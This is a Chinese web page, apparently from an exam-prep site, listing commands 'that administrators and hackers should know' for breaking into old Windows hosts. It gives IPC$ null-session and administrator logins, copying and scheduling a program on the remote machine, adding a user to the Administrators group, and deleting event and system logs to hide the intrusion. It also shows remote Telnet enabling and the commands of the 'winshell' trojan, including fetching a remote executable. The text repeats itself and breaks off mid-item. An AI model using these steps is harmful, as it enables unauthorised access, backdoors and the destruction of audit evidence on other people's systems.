考試大軟考站推薦:網(wǎng)絡(luò)管理員和黑客都應(yīng)知道的幾條命令
常用的幾條NET命令:
(與遠(yuǎn)程主機(jī)建立空管連接) net use file://IP/地址\ipc$ "" /use:""
(以管理員身份登錄遠(yuǎn)程主機(jī)) net use file://IP/地址\ipc$ "密碼" /use:"Administrator"
(傳送文件到遠(yuǎn)程主機(jī)WINNT目錄下)copy 本機(jī)目錄路徑\程序 file://IP/地址\admin$
(查看遠(yuǎn)程主機(jī)時(shí)間) net time file://IP/地址
(定時(shí)啟動(dòng)某個(gè)程序) at file://IP/地址 02:18 readme.exe
(查看共享) net view file://IP/地址
(查看netbios工作組列表) nbtstat -A IP地址
(將遠(yuǎn)程主機(jī)C盤映射為自己的F盤) net use f: file://IP/地址\c$ ""/user:"Administrator"
(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
net localgroup Administrators 用戶名 /add
(斷開連接) net use file://IP/地址\ipc$ /delete
掃尾:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
一、netsvc.exe
下面的命令分別是列出主機(jī)上的服務(wù)項(xiàng)目、查尋和遠(yuǎn)程啟動(dòng)主機(jī)的“時(shí)間任務(wù)”服務(wù):
netsvc /list file://IP/地址
netsvc schedule file://IP/地址 /query
netsvc file://IP/地址 schedule /start
二、OpenTelnet.exe
遠(yuǎn)程啟動(dòng)主機(jī)的Telnet服務(wù),并綁定端口到7878,例如:
OpenTelnet file://IP/地址 用戶名 密碼 1 7878
然后就可以telnet到主機(jī)的7878端口,進(jìn)入DOS方式下:
telnet IP地址 7878 三、winshell.exe
一個(gè)非常小的木馬(不到6K),telnet到主機(jī)的7878端口,輸入密碼winshell,當(dāng)看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (重新啟動(dòng)機(jī)器)
d shutDown (關(guān)閉機(jī)器)
s Shell (執(zhí)行后你就會(huì)看到可愛的“C:\>”)
x eXit (退出本次登錄會(huì)話,此命令并不終止winshell的運(yùn)行)
CMD> http://.../srv.exe (通過http下載其他網(wǎng)站上的文件到運(yùn)行winshell的機(jī)器上)
四、3389登陸器,GUI方式登錄遠(yuǎn)程主機(jī)的
常用的幾條NET命令:
(與遠(yuǎn)程主機(jī)建立空管連接) net use file://IP/地址\ipc$ "" /use:""
(以管理員身份登錄遠(yuǎn)程主機(jī)) net use file://IP/地址\ipc$ "密碼" /use:"Administrator"
(傳送文件到遠(yuǎn)程主機(jī)WINNT目錄下)copy 本機(jī)目錄路徑\程序 file://IP/地址\admin$
(查看遠(yuǎn)程主機(jī)時(shí)間) net time file://IP/地址
(定時(shí)啟動(dòng)某個(gè)程序) at file://IP/地址 02:18 readme.exe
(查看共享) net view file://IP/地址
(查看netbios工作組列表) nbtstat -A IP地址
(將遠(yuǎn)程主機(jī)C盤映射為自己的F盤) net use f: file://IP/地址\c$ ""/user:"Administrator"
(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
net localgroup Administrators 用戶名 /add
(斷開連接) net use file://IP/地址\ipc$ /delete
掃尾:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
一、netsvc.exe
下面的命令分別是列出主機(jī)上的服務(wù)項(xiàng)目、查尋和遠(yuǎn)程啟動(dòng)主機(jī)的“時(shí)間任務(wù)”服務(wù):
netsvc /list file://IP/地址
netsvc schedule file://IP/地址 /query
netsvc file://IP/地址 schedule /start
二、OpenTelnet.exe
遠(yuǎn)程啟動(dòng)主機(jī)的Telnet服務(wù),并綁定端口到7878,例如:
OpenTelnet file://IP/地址 用戶名 密碼 1 7878
然后就可以telnet到主機(jī)的7878端口,進(jìn)入DOS方式下:
telnet IP地址 7878 三、winshell.exe
一個(gè)非常小的木馬(不到6K),telnet到主機(jī)的7878端口,輸入密碼winshell,當(dāng)看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (重新啟動(dòng)機(jī)器)
d shutDown (關(guān)閉機(jī)器)
s Shell (執(zhí)行后你就會(huì)看到可愛的“C:\>”)
x eXit (退出本次登錄會(huì)話,此命令并不終止winshell的運(yùn)行)
CMD> http://.../srv.exe (通過http下載其他網(wǎng)站上的文件到運(yùn)行winshell的機(jī)器上)
四、3389登陸器,GUI方式登錄遠(yuǎn)程主機(jī)的